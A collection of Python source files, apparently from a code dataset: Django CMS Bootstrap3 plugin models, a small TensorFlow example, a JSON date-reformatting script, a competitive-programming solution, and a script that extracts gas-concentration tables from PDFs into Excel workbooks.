(#my-anchor) to the link.\"),\n )\n link_mailto = models.EmailField(\n _(\"mailto\"), blank=True, null=True, max_length=254\n )\n link_phone = models.CharField(\n _('Phone'), blank=True, null=True, max_length=40,\n )\n link_target = models.CharField(\n _(\"target\"), blank=True, max_length=100,\n choices=((\n (\"\", _(\"same window\")),\n (\"_blank\", _(\"new window\")),\n (\"_parent\", _(\"parent window\")),\n (\"_top\", _(\"topmost frame\")),\n ))\n )\n # Override this property in concrete classes as required.\n excluded_attr_keys = ['href', 'target', ]\n link_attributes = AttributesField(\n _('Link Attributes'), excluded_keys=excluded_attr_keys, blank=True)\n\n class Meta:\n abstract = True\n\n def get_link_url(self):\n if self.link_phone:\n link = u\"tel://{0}\".format(self.link_phone).replace(' ', '')\n elif self.link_mailto:\n link = u\"mailto:{0}\".format(self.link_mailto)\n elif self.link_url:\n link = self.link_url\n elif self.link_page_id:\n link = self.link_page.get_absolute_url()\n elif self.link_file:\n link = self.link_file.url\n else:\n link = \"\"\n if self.link_anchor:\n link += '#{0}'.format(self.link_anchor)\n return link\n\n\n#################\n# Basic Plugins #\n#################\n\n@python_2_unicode_compatible\nclass Boostrap3ButtonPlugin(CMSPlugin, LinkMixin):\n cmsplugin_ptr = CMSPluginField()\n excluded_attr_keys = ['class', 'href', 'target', ]\n\n label = models.CharField(\n _(\"label\"),\n max_length=256,\n blank=True,\n default='',\n )\n type = model_fields.LinkOrButton()\n\n # button specific fields\n btn_context = model_fields.Context(\n verbose_name='context',\n choices=constants.BUTTON_CONTEXT_CHOICES,\n 
default=constants.BUTTON_CONTEXT_DEFAULT,\n )\n btn_size = model_fields.Size(verbose_name='size')\n btn_block = models.BooleanField(default=False, verbose_name='block')\n # text link specific fields\n txt_context = model_fields.Context(\n verbose_name='context',\n choices=constants.TXT_LINK_CONTEXT_CHOICES,\n default=constants.TXT_LINK_CONTEXT_DEFAULT,\n blank=True,\n )\n # common fields\n icon_left = model_fields.Icon()\n icon_right = model_fields.Icon()\n\n classes = model_fields.Classes()\n responsive = model_fields.Responsive(\n blank=True,\n default='',\n )\n responsive_print = model_fields.ResponsivePrint(\n blank=True,\n default='',\n )\n\n def __str__(self):\n return self.label\n\n\n@python_2_unicode_compatible\nclass Boostrap3BlockquotePlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n reverse = models.BooleanField(default=False, blank=True)\n classes = model_fields.Classes()\n\n def __str__(self):\n return 'Blockquote: '\n\n\n@python_2_unicode_compatible\nclass Boostrap3IconPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n icon = model_fields.Icon(blank=False)\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.icon\n\n\n@python_2_unicode_compatible\nclass Boostrap3LabelPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n label = models.CharField(\n _(\"label\"),\n max_length=256,\n blank=True,\n default='',\n )\n context = model_fields.Context(\n choices=constants.LABEL_CONTEXT_CHOICES,\n default=constants.LABEL_CONTEXT_DEFAULT,\n blank=False,\n )\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.label\n\n\n@python_2_unicode_compatible\nclass Boostrap3WellPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n size = model_fields.Size()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.classes\n\n\n@python_2_unicode_compatible\nclass Boostrap3AlertPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n context = model_fields.Context()\n icon = model_fields.Icon()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.classes\n\n\ndef compute_aspect_ratio(image):\n if image.exif.get('Orientation', 1) > 4:\n # image is rotated by 90 degrees, while keeping width and height\n return float(image.width) / float(image.height)\n else:\n return float(image.height) / float(image.width)\n\n\n@python_2_unicode_compatible\nclass Boostrap3ImagePlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n file = filer.fields.image.FilerImageField(\n verbose_name=_(\"file\"),\n blank=False,\n null=True,\n on_delete=models.SET_NULL,\n related_name='+',\n )\n alt = model_fields.MiniText(\n _(\"alt\"),\n blank=True,\n default='',\n )\n title = model_fields.MiniText(\n _(\"title\"),\n blank=True,\n default='',\n )\n use_original_image = models.BooleanField(\n _(\"use original image\"),\n blank=True,\n default=False,\n help_text=_(\n \"use the original full-resolution image (no resizing).\"\n )\n )\n override_width = models.IntegerField(\n _(\"override width\"),\n blank=True,\n null=True,\n help_text=_(\n 'if this field is provided it will be used to scale image.'\n )\n )\n override_height = models.IntegerField(\n _(\"override height\"),\n blank=True,\n null=True,\n help_text=_(\n 'if this field is provided it will be used to scale image. 
'\n            'If aspect ratio is selected - height will be calculated '\n            'based on that.'\n        )\n    )\n    aspect_ratio = models.CharField(\n        _(\"aspect ratio\"),\n        max_length=10,\n        blank=True,\n        default='',\n        choices=constants.ASPECT_RATIO_CHOICES\n    )\n    thumbnail = models.BooleanField(\n        _(\"thumbnail\"),\n        default=False,\n        blank=True,\n        help_text=\"add the 'thumbnail' border\",\n    )\n    shape = models.CharField(\n        _('shape'),\n        max_length=64,\n        blank=True,\n        default='',\n        choices=(\n            ('rounded', 'rounded'),\n            ('circle', 'circle'),\n        )\n    )\n\n    classes = model_fields.Classes()\n    img_responsive = models.BooleanField(\n        verbose_name='class: img-responsive',\n        default=True,\n        blank=True,\n        help_text='whether to treat the image as using 100% width of the '\n                  'parent container (sets the img-responsive class).'\n    )\n\n    def __str__(self):\n        txt = 'Image'\n\n        if self.file_id and self.file.label:\n            txt = self.file.label\n        return txt\n\n    def srcset(self):\n        if not self.file:\n            return []\n        items = collections.OrderedDict()\n        if self.aspect_ratio:\n            aspect_width, aspect_height = tuple([int(i) for i in self.aspect_ratio.split('x')])\n        else:\n            aspect_width, aspect_height = None, None\n        for device in constants.DEVICES:\n            if self.override_width:\n                width = self.override_width\n            else:\n                # TODO: should this be based on the containing col size?\n                width = device['width_gutter']\n            width_tag = str(width)\n            if aspect_width is not None and aspect_height is not None:\n                height = int(float(width)*float(aspect_height)/float(aspect_width))\n                crop = True\n            else:\n                if self.override_height:\n                    height = self.override_height\n                else:\n                    height = 0\n                crop = False\n            items[device['identifier']] = {\n                'size': (width, height),\n                'size_str': \"{}x{}\".format(width, height),\n                'width_str': \"{}w\".format(width),\n                'subject_location': self.file.subject_location,\n                'upscale': True,\n                'crop': crop,\n                'aspect_ratio': (aspect_width, aspect_height),\n                'width_tag': width_tag,\n            }\n\n        return items\n\n\n@python_2_unicode_compatible\nclass Boostrap3SpacerPlugin(CMSPlugin):\n    cmsplugin_ptr = CMSPluginField()\n\n    size = model_fields.Size()\n\n    classes = model_fields.Classes()\n\n    def __str__(self):\n        return 'size-' + self.size + ' ' + self.classes\n\n\n@python_2_unicode_compatible\nclass Bootstrap3FilePlugin(CMSPlugin):\n    cmsplugin_ptr = CMSPluginField()\n\n    file = filer.fields.file.FilerFileField(\n        verbose_name=_(\"file\"),\n        null=True,\n        blank=False,\n        on_delete=models.SET_NULL,\n        related_name='+',\n    )\n    name = model_fields.MiniText(\n        _(\"name\"),\n        blank=True,\n        default='',\n    )\n    open_new_window = models.BooleanField(default=False)\n    show_file_size = models.BooleanField(default=False)\n\n    # common fields\n    icon_left = model_fields.Icon()\n    icon_right = model_fields.Icon()\n\n    classes = model_fields.Classes()\n\n    def __str__(self):\n        label = self.name\n        if not label:\n            if self.file_id:\n                label = self.file.label\n            else:\n                label = 'File'\n        return label\n\n\n#########\n# Panel #\n#########\n\n\n@python_2_unicode_compatible\nclass Boostrap3PanelPlugin(CMSPlugin):\n    cmsplugin_ptr = CMSPluginField()\n\n    context = model_fields.Context(\n        choices=constants.PANEL_CONTEXT_CHOICES,\n        default=constants.PANEL_CONTEXT_DEFAULT,\n        blank=False,\n    )\n\n    classes = model_fields.Classes()\n\n    def __str__(self):\n        return self.context\n\n\n@python_2_unicode_compatible\nclass Boostrap3PanelHeadingPlugin(CMSPlugin):\n    cmsplugin_ptr = CMSPluginField()\n\n    title = model_fields.MiniText(\n        _(\"title\"),\n        blank=True,\n        default='',\n        help_text='Alternatively you can add 
plugins'\n )\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.title\n\n\n@python_2_unicode_compatible\nclass Boostrap3PanelBodyPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.classes\n\n\n@python_2_unicode_compatible\nclass Boostrap3PanelFooterPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.classes\n\n\n########\n# Grid #\n########\n\nColSizeField = partial(\n model_fields.IntegerField,\n null=True,\n blank=True,\n default=None,\n min_value=1,\n max_value=constants.GRID_SIZE\n)\n\nOffsetSizeField = partial(\n model_fields.IntegerField,\n null=True,\n blank=True,\n default=None,\n min_value=0,\n max_value=constants.GRID_SIZE\n)\n\nPushSizeField = partial(\n model_fields.IntegerField,\n null=True,\n blank=True,\n default=None,\n min_value=0,\n max_value=constants.GRID_SIZE\n)\n\nPullSizeField = partial(\n model_fields.IntegerField,\n null=True,\n blank=True,\n default=None,\n min_value=0,\n max_value=constants.GRID_SIZE\n)\n\n\nclass Bootstrap3RowPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n classes = model_fields.Classes()\n\n def get_short_description(self):\n instance = self.get_plugin_instance()[0]\n\n if not instance:\n return ugettext(\"\")\n\n column_count = len(self.child_plugin_instances or [])\n column_count_str = ungettext(\n \"1 column\",\n \"%(count)i columns\",\n column_count\n ) % {'count': column_count}\n\n if self.classes:\n return \"{} ({})\".format(\n self.classes,\n column_count_str\n )\n return column_count_str\n\n\n@python_2_unicode_compatible\nclass Bootstrap3ColumnPlugin(CMSPlugin):\n DEVICE_CHOICES = constants.DEVICE_CHOICES\n DEVICE_SIZES = constants.DEVICE_SIZES\n\n cmsplugin_ptr = CMSPluginField()\n classes = model_fields.Classes()\n tag = models.SlugField(default='div')\n\n def __str__(self):\n txt = ' '.join([self.get_column_classes(), self.classes])\n if self.tag != 'div':\n txt = '{} ({})'.format(txt, self.tag)\n return txt\n\n def get_class(self, device, element):\n size = getattr(self, '{}_{}'.format(device, element), None)\n if size is not None:\n if element == 'col':\n return 'col-{}-{}'.format(device, size)\n else:\n return 'col-{}-{}-{}'.format(device, element, size)\n return ''\n\n def get_column_classes(self):\n classes = []\n for device in self.DEVICE_SIZES:\n for element in ('col', 'offset', 'push', 'pull'):\n classes.append(self.get_class(device, element))\n return ' '.join(cls for cls in classes if cls)\n\n\nfor size, name in constants.DEVICE_CHOICES:\n Bootstrap3ColumnPlugin.add_to_class(\n '{}_col'.format(size),\n ColSizeField(verbose_name=_('col-{}-'.format(size))),\n )\n Bootstrap3ColumnPlugin.add_to_class(\n '{}_offset'.format(size),\n OffsetSizeField(verbose_name=_('offset-'.format(size))),\n )\n Bootstrap3ColumnPlugin.add_to_class(\n '{}_push'.format(size),\n PushSizeField(verbose_name=_('push-'.format(size))),\n )\n Bootstrap3ColumnPlugin.add_to_class(\n '{}_pull'.format(size),\n PullSizeField(verbose_name=_('pull-'.format(size))),\n )\n\n\n\n#############\n# Accordion #\n#############\n\nclass Bootstrap3AccordionPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n index = models.PositiveIntegerField(\n _('index'), null=True, blank=True,\n help_text=_('index of element that should be opened on page load '\n '(leave it empty if none of the items should be opened)'))\n classes = model_fields.Classes()\n\n def get_short_description(self):\n instance 
= self.get_plugin_instance()[0]\n\n if not instance:\n return ugettext(\"\")\n\n column_count = len(self.child_plugin_instances or [])\n column_count_str = ungettext(\n \"1 item\",\n \"%(count)i items\",\n column_count\n ) % {'count': column_count}\n return column_count_str\n\n\n@python_2_unicode_compatible\nclass Bootstrap3AccordionItemPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n title = model_fields.MiniText(\n _(\"title\"),\n blank=True,\n default='',\n )\n context = model_fields.Context(\n choices=constants.ACCORDION_ITEM_CONTEXT_CHOICES,\n default=constants.ACCORDION_ITEM_CONTEXT_DEFAULT,\n blank=False,\n )\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.title\n\n\n#############\n# ListGroup #\n#############\n\nclass Bootstrap3ListGroupPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n classes = model_fields.Classes()\n add_list_group_class = models.BooleanField(\n verbose_name='class: list-group',\n default=True,\n blank=True,\n help_text='whether to add the list-group and list-group-item classes'\n )\n\n def get_short_description(self):\n instance = self.get_plugin_instance()[0]\n\n if not instance:\n return ugettext(\"\")\n\n column_count = len(self.child_plugin_instances or [])\n column_count_str = ungettext(\n \"1 item\",\n \"%(count)i items\",\n column_count\n ) % {'count': column_count}\n return column_count_str\n\n\n@python_2_unicode_compatible\nclass Bootstrap3ListGroupItemPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n title = model_fields.MiniText(\n _(\"title\"),\n blank=True,\n default='',\n )\n context = model_fields.Context(\n choices=constants.LIST_GROUP_ITEM_CONTEXT_CHOICES,\n default=constants.LIST_GROUP_ITEM_CONTEXT_DEFAULT,\n blank=True,\n )\n state = models.CharField(\n verbose_name='state',\n choices=(\n ('active', 'active'),\n ('disabled', 'disabled'),\n ),\n max_length=255,\n blank=True,\n )\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.title\n\n\n############\n# Carousel # derived from https://github.com/aldryn/aldryn-gallery/tree/0.2.6\n############\n\n@python_2_unicode_compatible\nclass Bootstrap3CarouselPlugin(CMSPlugin):\n STYLE_DEFAULT = 'standard'\n\n STYLE_CHOICES = [\n (STYLE_DEFAULT, _('Standard')),\n ]\n\n TRANSITION_EFFECT_CHOICES = (\n ('slide', _('Slide')),\n )\n\n cmsplugin_ptr = CMSPluginField()\n style = models.CharField(\n _('Style'),\n choices=STYLE_CHOICES + utils.get_additional_styles(),\n default=STYLE_DEFAULT,\n max_length=50,\n )\n aspect_ratio = models.CharField(\n _(\"aspect ratio\"),\n max_length=10,\n blank=True,\n default='',\n choices=constants.ASPECT_RATIO_CHOICES\n )\n transition_effect = models.CharField(\n _('Transition Effect'),\n choices=TRANSITION_EFFECT_CHOICES,\n default='',\n max_length=50,\n blank=True,\n )\n ride = models.BooleanField(\n _('Ride'),\n default=True,\n help_text=_('Whether to mark the carousel as animating '\n 'starting at page load.'),\n )\n interval = models.IntegerField(\n _('Interval'),\n default=5000,\n help_text=_(\"The amount of time to delay between automatically \"\n \"cycling an item.\"),\n )\n wrap = models.BooleanField(\n default=True,\n blank=True,\n help_text=_('Whether the carousel should cycle continuously or '\n 'have hard stops.')\n )\n pause = models.BooleanField(\n default=True,\n blank=True,\n help_text=_('Pauses the cycling of the carousel on mouseenter and '\n 'resumes the cycling of the carousel on mouseleave.')\n )\n classes = model_fields.Classes()\n\n def __str__(self):\n data = 
django.forms.models.model_to_dict(self)\n data.update(dict(\n style_label=_('Style'),\n transition_effect_label=_('Transition Effect'),\n ride_label=_('Ride'),\n interval_label=_('Interval'),\n aspect_ratio_label=_('Aspect Ratio'),\n ))\n fields = [\n 'style',\n 'transition_effect',\n 'ride',\n 'interval',\n 'aspect_ratio',\n ]\n if not data['ride']:\n fields.remove('interval')\n return ', '.join([\n '{key}: {value}'.format(\n key=data['{}_label'.format(field)],\n value=data[field]\n ) for field in fields\n ])\n\n def srcset(self):\n # more or less copied from image plugin.\n # TODO: replace with generic sizes/srcset solution\n items = collections.OrderedDict()\n if self.aspect_ratio:\n aspect_width, aspect_height = tuple([int(i) for i in self.aspect_ratio.split('x')])\n else:\n aspect_width, aspect_height = None, None\n for device in constants.DEVICES:\n width = device['width_gutter'] # TODO: should this should be based on the containing col size?\n width_tag = str(width)\n if aspect_width is not None and aspect_height is not None:\n height = int(float(width)*float(aspect_height)/float(aspect_width))\n crop = True\n else:\n height = 0\n crop = False\n items[device['identifier']] = {\n 'size': (width, height),\n 'size_str': \"{}x{}\".format(width, height),\n 'width_str': \"{}w\".format(width),\n # 'subject_location': self.file.subject_location,\n 'upscale': True,\n 'crop': crop,\n 'aspect_ratio': (aspect_width, aspect_height),\n 'width_tag': width_tag,\n }\n\n return items\n\n@python_2_unicode_compatible\nclass Bootstrap3CarouselSlidePlugin(CMSPlugin, LinkMixin):\n excluded_attr_keys = ['class', 'href', 'target', ]\n cmsplugin_ptr = CMSPluginField()\n image = filer.fields.image.FilerImageField(\n verbose_name=_('image'),\n blank=False,\n null=True,\n related_name='+',\n on_delete=models.SET_NULL,\n )\n link_text = models.CharField(\n verbose_name=_('link text'),\n max_length=200,\n blank=True\n )\n content = djangocms_text_ckeditor.fields.HTMLField(\n _(\"Content\"),\n blank=True,\n default='',\n help_text=_('alternatively add sub plugins as content'),\n )\n classes = model_fields.Classes()\n\n def __str__(self):\n image_text = content_text = ''\n\n if self.image_id:\n if self.image.name:\n image_text = self.image.name\n elif self.image.original_filename \\\n and os.path.split(self.image.original_filename)[1]:\n image_text = os.path.split(self.image.original_filename)[1]\n else:\n image_text = 'Image'\n if self.content:\n text = strip_tags(self.content).strip()\n if len(text) > 100:\n content_text = '{}...'.format(text[:100])\n else:\n content_text = '{}'.format(text)\n\n if image_text and content_text:\n return '{} ({})'.format(image_text, content_text)\n else:\n return image_text or content_text\n\n\n@python_2_unicode_compatible\nclass Bootstrap3CarouselSlideFolderPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n folder = filer.fields.folder.FilerFolderField(\n verbose_name=_('folder'),\n )\n classes = model_fields.Classes()\n\n def __str__(self):\n if self.folder_id:\n return self.folder.pretty_logical_path\n else:\n return _('not selected yet')\n","repo_name":"TrellixVulnTeam/kessbiotech_N8EW","sub_path":"kess/Lib/site-packages/aldryn_bootstrap3/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":23412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71243849800","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 8 11:33:22 2019\n\n@author: zhuyangze\n\"\"\"\n\nimport 
tensorflow as tf\n\n# Define constants\na = tf.constant(3)\nb = tf.constant(4)\n\n# Create a session\nwith tf.Session() as sess:\n    print(\"Sum: %i\" % sess.run(a + b))\n    print(\"Product: %i\" % sess.run(a * b))","repo_name":"LingChenBill/tensorflow_combat","sub_path":"4-2 with-session.py","file_name":"4-2 with-session.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"27682361172","text":"import json\n\nwith open(\"roj_dan_tekmovalcev.json\", \"r+\") as jsonDat:\n    podatki = json.load(jsonDat)\n\n    for podatek in podatki:\n        datum = podatek[\"datum\"]\n        dan = datum[:2]\n        mesec = datum[3:5]\n        leto = datum[-4:]\n        podatek[\"datum\"] = leto + \"-\" + mesec + \"-\" + dan\n\n    jsonDat.seek(0)\n    json.dump(podatki, jsonDat)\n    jsonDat.truncate()\n","repo_name":"SashaOslaj/ZimskeOI","sub_path":"preoblikuj_datume.py","file_name":"preoblikuj_datume.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"25280852987","text":"#!/usr/bin/env python3\n\ndef main():\n    S = input()[:-1]\n    while S:\n        if len(S) % 2 == 0 and S[:len(S)//2] == S[len(S)//2:]:\n            print(len(S))\n            return\n        S = S[:-1]\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"dmiyakawa/atcoder-workspace","sub_path":"abc066/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"6521669926","text":"from math import isnan\nimport glob\nimport xlsxwriter\nimport os\nimport re\nimport tabula\nimport pandas as pd\nimport tkinter\nimport tkinter.filedialog\nfrom pdfminer import high_level\nimport PySimpleGUI as sg\nimport traceback\n\nfrom utils import linear_regression\n\n\n# retrieve all pdfs in given folder\ndef get_PDFs(folder):\n    PDFs = glob.glob(folder + \"/*.pdf\")\n    return PDFs\n\n\n# turn user inputted sample name regex into python re regex\ndef process_regex(naming_regex):\n    naming_regex = naming_regex.lower()\n    regex = naming_regex.replace('s', '\\\\D+') # 's' for strings\n    regex = regex.replace('d', '\\\\d+(?:\\\\.\\\\d+)?') # 'd' for numbers\n    regex = regex.replace('x', '.+') # 'x' for either\n    regex = regex.replace('-', '[\\\\s_-]+') # '-' for delimiter\n    return regex, naming_regex.count('(') # for columns\n\n\n# universalize dates\ndef process_date(date):\n\n    date_regex = r\"([a-zA-Z]+)[\\\\s-]?(\\\\d+)[,sth]*[\\\\s-]?(\\\\d{2,4})?\" # date regex for 'Sample ID' column\n\n    # dictionary for matching inputted months with standard format\n    months = {'jan' : 'January', 'january' : 'January',\n            'feb': 'February', 'february': 'February',\n            'mar': 'March', 'march': 'March',\n            'apr' : 'April', 'april': 'April',\n            'may': 'May',\n            'jun': 'June', 'june': 'June',\n            'jul': 'July', 'july': 'July',\n            'aug': 'August', 'august': 'August',\n            'sep': 'September', 'sept': 'September', 'september': 'September',\n            'oct': 'October', 'october': 'October',\n            'nov': 'November', 'november': 'November',\n            'dec': 'December', 'december': 'December'}\n\n    match = re.search(date_regex, str(date))\n\n    # if can't match a month, just return what was passed (as a string)\n    if match:\n        if str(match[1]).lower() in months:\n            month = months[match[1].lower()]\n            day = match[2]\n            year = match[3]\n            return month + \" \" + day + (\", \" + year if year else \", 2021\")\n        else:\n            return date\n    else:\n        if isinstance(date, float) and isnan(date):\n            return 'empty'\n        return str(date)\n
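\n\n# Example (illustrative; not part of the original script): process_regex(\"s-d\")\n# returns ('\\\\D+[\\\\s_-]+\\\\d+(?:\\\\.\\\\d+)?', 0); the group count is 0 because capture\n# groups must be parenthesized explicitly in the naming regex.\n\n# 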
scrape GC data from each PDF in the given folder\ndef process_PDFs(samples, standards, sample_rows, PDFs, window, regex, count):\n counter = 0 # counter for pysimpleGUI progress bar\n longest_file_name = 0 # longest file name for excel output\n standard_regex = r\"(\\d*)\\s?ppm\" # regex for identifying standards\n concentration_regex = r\"-?\\d*\\.\\d*\" # regex for pulling raw numbers\n dates = [] # all dates with data\n\n for file in PDFs:\n\n # for whatever reason there are two different orders for the gas tables \n # if methane table is labeled 'Methane' vs 'CH4' correspond to a different overall order\n order_check_re = r\"Methane\"\n order_check = high_level.extract_text(file, '', 0)\n order_check_match = re.search(order_check_re, order_check)\n\n if order_check_match:\n order = {0: 0, 1: 1, 2: 2, 3: 3, 4: 4}\n else:\n order = {0: 0, 1: 2, 2: 3, 3: 1, 4: 4}\n\n if len(file) > longest_file_name:\n longest_file_name = len(file)\n\n if window:\n # generate progress bar\n event, values = window.read(timeout=10)\n window['-PROG-'].update(counter + 1)\n counter += 1\n if file == 'merged.pdf':\n continue\n\n print(\"Processing: \" + file)\n\n # get tables from pdf merge all gas concentration tables split between pages\n tables = tabula.read_pdf(file, pages = 'all')\n methane = tables[0]\n methane = methane.reset_index()\n num_samples = len(tables[0].index)\n processed_tables = []\n processed_tables.append(tables[0])\n\n merged = [0]\n for i in range(len(tables)):\n if i not in merged:\n temp_table = tables[i]\n while len(temp_table.index) != num_samples:\n k = i + 1\n temp_table = pd.concat([temp_table, tables[k]])\n merged.append(k)\n processed_tables.append(temp_table)\n\n\n # go through each table and pull the samples concentration for that gas, building a dictionary\n gasses = ['Methane', 'Carbon Dioxide', 'Oxygen', 'Nitrogen', 'Nitrous Oxide']\n\n for i in range(len(processed_tables)):\n processed_tables[i] = processed_tables[i].reset_index()\n print(processed_tables[i])\n for index, row in processed_tables[i].iterrows():\n if re.search(standard_regex, row['Sample Name']): # if standard\n standard = row['Sample Name'].replace(\" \", \"\")\n standards[standard][gasses[order[i]]].append(float(re.search(concentration_regex, row['Conc. Unit'])[0]))\n if gasses[i] == 'Methane':\n standards[standard]['File'].append(file)\n else: # else if sample\n date = process_date(row['Sample ID']) # process the date\n if date.lower() != 'blank':\n if date not in dates:\n dates.append(date)\n if date not in samples:\n samples[date] = {}\n\n # builds sample dictionary by working down for each column until the final layer for storing gas conc.\n current_sample = samples[date]\n sample_name = re.search(regex, row['Sample Name'])\n if sample_name:\n for j in range(count):\n if sample_name[j + 1] in current_sample:\n current_sample = current_sample[sample_name[j + 1]]\n else:\n if j + 1 == count:\n current_sample[sample_name[j + 1]] = ['', '', '', '', '', '']\n current_sample = current_sample[sample_name[j + 1]]\n else:\n current_sample[sample_name[j + 1]] = {}\n current_sample = current_sample[sample_name[j + 1]]\n \n current_sample[order[i]] = float(re.search(concentration_regex, row['Conc. 
Unit'])[0])\n current_sample[5] = file\n\n return samples, standards, sample_rows, longest_file_name, dates\n\n\n# calculate flux for each sample, recursively navigate down to the bottom layer for time and calculate flux\ndef flux_helper(val, count, current):\n if current > count:\n for k, v in val.items():\n flux_helper(v, count, current + 1)\n else:\n for k, v in val.items():\n v[\"RoC (ppm/min)\"] = []\n v[\"R2\"] = []\n for i in range(0, 5):\n X = []\n Y = []\n for time in v:\n if time == \"RoC (ppm/min)\" or time == \"R2\":\n continue\n \n X.append(float(time))\n Y.append(float(v[time][i]))\n\n try:\n m, b, R2 = linear_regression(X, Y)\n v[\"RoC (ppm/min)\"].append(round(m, 3)) \n v[\"R2\"].append(round(R2, 3))\n except:\n v[\"RoC (ppm/min)\"].append('')\n v[\"R2\"].append('')\n\n\n# initiate recursive flux calculation\ndef flux(something, count):\n for k, v in something.items():\n flux_helper(v, count - 1, 0)\n\n\n# flatten sample dictionary into list of lists for excel reporting\ndef flatten(something):\n list_o_list = []\n for k, v in something.items():\n key_list = [k]\n flatten_helper(v, key_list, list_o_list)\n return list_o_list\n\n\n# recursive helper for flattener\ndef flatten_helper(val, key_list, list_o_list):\n if isinstance(val, dict):\n for k, v in val.items():\n key_list.append(k)\n flatten_helper(v, key_list, list_o_list)\n key_list.pop()\n else:\n list_o_list.append(key_list + val)\n \n \n# output results to excel sheet\ndef output_data(samples, standards, longest_file_name, columns, dates, count):\n \n # column number map for flux formula\n column_number_map = {\n 1: 'A',\n 2: 'B',\n 3: 'C',\n 4: 'D',\n 5: 'E',\n 6: 'F',\n 7: 'G',\n 8: 'H',\n 9: 'I',\n 10: 'J'\n }\n\n # get output file location from user\n out = tkinter.filedialog.asksaveasfilename(defaultextension='.xlsx')\n workbook = xlsxwriter.Workbook(out)\n\n # setting up formatting for legibility \n title_format = workbook.add_format()\n title_format.set_bg_color('#65BDFB')\n\n data_format = {}\n flux_format = {}\n\n data_format[1] = workbook.add_format()\n data_format[1].set_bg_color('#A3D8FC')\n flux_format[1] = workbook.add_format({'bold': True})\n flux_format[1].set_bg_color('#A3D8FC')\n\n data_format[0] = workbook.add_format()\n data_format[0].set_bg_color('#C2E5FD')\n flux_format[0] = workbook.add_format({'bold': True})\n flux_format[0].set_bg_color('#C2E5FD')\n\n # publish standards sheet\n worksheet = workbook.add_worksheet(\"Standards\")\n worksheet.freeze_panes(1, 0)\n worksheet.write_row(0, 0, [\"Standard\", \"Methane (ppm)\", \"Carbon Dioxide (ppm)\", \"Oxygen (%)\", \"Nitrogen (%)\", \"Nitrous Oxide (ppm)\", \"File\"], title_format)\n row = 1\n data_format_num = 1\n for standard in standards:\n for k in range(len(standards[standard]['Methane'])):\n worksheet.write_row(row , 0, [standard, standards[standard]['Methane'][k], standards[standard]['Carbon Dioxide'][k], standards[standard]['Oxygen'][k], standards[standard]['Nitrogen'][k], standards[standard]['Nitrous Oxide'][k], standards[standard]['File'][k]], data_format[data_format_num])\n row += 1\n data_format_num = 1 - data_format_num\n \n # set column width for each gas\n worksheet.set_column(0, 0, len(\"standard\"))\n worksheet.set_column(1, 1, len(\"Methane (ppm)\"))\n worksheet.set_column(2, 2, len(\"Carbon Dioxide (ppm)\"))\n worksheet.set_column(3, 3, len(\"Oxygen (%)\"))\n worksheet.set_column(4, 4, len(\"Nitrogen (%)\"))\n worksheet.set_column(5, 5, len(\"Nitrous Oxide (ppm)\"))\n worksheet.set_column(6, 6, longest_file_name)\n\n # publish 
sample concentration results\n for date in dates:\n if str(date).lower() != 'blank':\n worksheet = workbook.add_worksheet(str(date))\n worksheet.set_column(0 + len(columns), 0 + len(columns), len(\"Methane (ppm)\"))\n worksheet.set_column(1 + len(columns), 1 + len(columns), len(\"Carbon Dioxide (ppm)\"))\n worksheet.set_column(2 + len(columns), 2 + len(columns), len(\"Oxygen (%)\"))\n worksheet.set_column(3 + len(columns), 3 + len(columns), len(\"Nitrogen (%)\"))\n worksheet.set_column(4 + len(columns), 4 + len(columns), len(\"Nitrous Oxide (ppm)\"))\n worksheet.set_column(5 + len(columns), 5 + len(columns), longest_file_name)\n\n row = 1 # current row number\n data_format_num = 1 # data format number for legibility\n worksheet.freeze_panes(1, 0) # freeze top row\n\n # print top row columns\n for k in range(len(columns)):\n worksheet.set_column(k, k, len(columns[k]))\n if k == count - 1:\n worksheet.set_column(k, k, len(\"RoC (ppm/min)\"))\n worksheet.write_row(0, 0, columns + [\"Methane (ppm)\", \"Carbon Dioxide (ppm)\", \"Oxygen (%)\", \"Nitrogen (%)\", \"Nitrous Oxide (ppm)\", \"File\"], title_format)\n \n # iterate through list of lists of each sample row\n current_sample = samples[0][1]\n for i in range(len(samples)):\n if samples[i][0] == date: # if it's the right date then print it\n if samples[i][1] != current_sample: # alternate output format for each sample for legibility\n data_format_num = 1 - data_format_num\n current_sample = samples[i][1]\n if samples[i][count] == 'RoC (ppm/min)': # bold rate of change\n worksheet.write_row(row, 0, samples[i][1:] + [''], flux_format[data_format_num])\n elif 